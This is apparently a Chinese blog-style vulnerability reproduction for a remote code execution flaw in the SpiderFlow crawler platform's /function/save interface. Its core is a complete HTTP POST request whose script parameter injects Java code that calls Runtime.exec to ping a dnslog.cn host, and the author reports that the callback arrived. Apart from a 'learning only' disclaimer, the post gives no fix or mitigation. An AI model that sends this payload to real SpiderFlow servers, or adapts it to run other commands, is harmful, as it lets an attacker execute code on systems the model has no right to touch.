前言
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
一、漏洞情况分析
SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发,因此收到很多人的喜欢,在gitee上有7.4K Star。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器
二、漏洞复现
进入到you-ip:port/function/save,大概就是这个样子
bp抓包就行了,由于没有bp我们就f12抓一下,构造一下payload
POST /function/save HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+mmazzn.dnslog.cn')%3B%7B
这是我的请求包,然后点击发送
咱们这边dnslog有回显了,下步你们自己慢慢去研究吧
后语:
别乱来